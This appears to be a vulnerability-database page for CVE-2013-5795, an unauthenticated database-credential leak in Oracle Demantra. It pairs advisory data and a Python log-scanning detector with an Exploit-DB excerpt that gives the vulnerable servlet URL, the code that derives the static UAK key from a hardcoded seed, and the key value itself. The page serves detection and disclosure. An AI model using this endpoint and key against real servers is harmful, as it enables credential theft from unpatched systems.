CVE-2013-5795
Published 2014-01-15
CVE-2013-5795: Unspecified vulnerability in the Oracle Demantra Demand Management component in Oracle Supply Chain Products Suite 7.2.0.3 SQL-Server, 7.3.0, 7.3.1, 12.2.1…
Priority P3 · 51 · medium · 5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 59.49% (99.0th percentile)
Unspecified vulnerability in the Oracle Demantra Demand Management component in Oracle Supply Chain Products Suite 7.2.0.3 SQL-Server, 7.3.0, 7.3.1, 12.2.1, 12.2.2, and 12.2.3 allows remote attackers to affect confidentiality via unknown vectors related to DM Others.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | supply_chain_products_suite | — | — |
| oracle | supply_chain_products_suite_sql-server | — | — |
| oracle | supply_chain_products_suite_sql-server | — | — |
| oracle | supply_chain_products_suite_sql-server | — | — |
| oracle | supply_chain_products_suite_sql-server | — | — |
| oracle | supply_chain_products_suite_sql-server | — | — |
Detection & IOCs (extracted from sources)
- Monitor HTTP requests to /demantra/ServerDetailsServlet with a UAK query parameter. This endpoint leaks database credentials to unauthenticated callers.
- The static UAK key value 406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1 is computed deterministically from the hardcoded seed 'er6Us8wB'. Alert on any request containing this exact value in the UAK parameter.
- The exploit is usable by unauthenticated remote attackers; look for unauthenticated GET requests to ServerDetailsServlet in web/application server logs.
- The UAK key is computed statically from the hardcoded seed string 'er6Us8wB' using SHA-256; it does not change between deployments, making the attack fully reproducible against any unpatched instance.
- Affected versions span multiple SQL-Server and non-SQL-Server builds (7.2.0.3, 7.3.0, 7.3.1, 12.2.1, 12.2.2, 12.2.3); the Metasploit module specifically targets 12.2.1 but the credential-leak endpoint is present across all listed versions.
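The monitoring points above combined into one access-log check, as an added example that is not part of the original page or of any vendor tooling. It assumes Apache/Tomcat combined-format logs; the function names, severity labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Static UAK value exactly as quoted on this page.
STATIC_UAK = "406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1"

# Assumed log layout: ip ident user [time] "METHOD target PROTO" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')

def classify(line):
    """Return a finding for a ServerDetailsServlet request, or None.
    no_logged_user is True when the log's user field is "-" (approximation)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # Decode %xx, drop ";jsessionid=..." path parameters, ignore case.
    path = unquote(url.path).split(";")[0].rstrip("/").lower()
    if not path.endswith("/serverdetailsservlet"):
        return None
    query = {k.lower(): v for k, v in
             parse_qs(url.query, keep_blank_values=True).items()}
    values = query.get("uak")
    if values is None:
        severity = "low"       # endpoint touched, no key supplied
    elif any(v.strip().upper() == STATIC_UAK for v in values):
        severity = "high"      # exact static key from the page
    else:
        severity = "medium"    # some other UAK value
    return {"ip": m["ip"], "severity": severity,
            "status": int(m["status"]),
            "no_logged_user": m["user"] == "-"}

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges, not real traffic).
TS = "[01/Mar/2014:10:00:00 +0000]"
SAMPLE = [
    f'192.0.2.10 - - {TS} "GET /demantra/ServerDetailsServlet?UAK={STATIC_UAK} HTTP/1.1" 200 312',
    f'192.0.2.11 - - {TS} "GET /demantra/%53erverDetailsServlet;jsessionid=x?uak={STATIC_UAK.lower()} HTTP/1.1" 200 312',
    f'198.51.100.7 - - {TS} "GET /demantra/ServerDetailsServlet?UAK=abc123 HTTP/1.1" 403 0',
    f'198.51.100.8 - alice {TS} "GET /demantra/ServerDetailsServlet HTTP/1.1" 404 0',
    f'198.51.100.9 - - {TS} "GET /demantra/portal/loginpage.jsp HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

A "high" finding with status 200 is the case to triage first, since the page states the endpoint returns database credentials to the caller.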
No detection rules found.
Exploit-DB
Oracle Demantra 12.2.1 - Database Credentials Disclosure
exploitdb·2014-03-01
---
Details:
Demantra has a backend function that allows anyone to retrieve the database instance name and the corresponding credentials.
Impact:
A remote, unauthenticated attacker could exploit this issue in combination with other found issues, to extract the database credentials and instance name.
Exploit:
The target URL is:
http://target.com:8080/demantra/ServerDetailsServlet?UAK=
Now the UAK key is calculated statically:
String encryptedPassword = new String(CryptographicService.encodeHashStringHex("er6Us8wB", "SHA-256"));
StringBuffer tmp = new StringBuffer("sge");
tmp.append(0);
tmp.append(encryptedPassword);
uak = new String(CryptographicService.encodeHashStringHex(tmp.toString(), "SHA-256"));
From that information
Metasploit
Oracle Demantra Database Credentials Leak
metasploit
This module exploits a database credentials leak found in Oracle Demantra 12.2.1 in combination with an authentication bypass. This way an unauthenticated user can retrieve the database name, username and password on any vulnerable machine.
No writeups or analysis indexed.
- http://osvdb.org/102096
- http://secunia.com/advisories/56474
- http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html
- http://www.securityfocus.com/bid/64758
- http://www.securityfocus.com/bid/64846
- http://www.securitytracker.com/id/1029620
2014-01-15
Published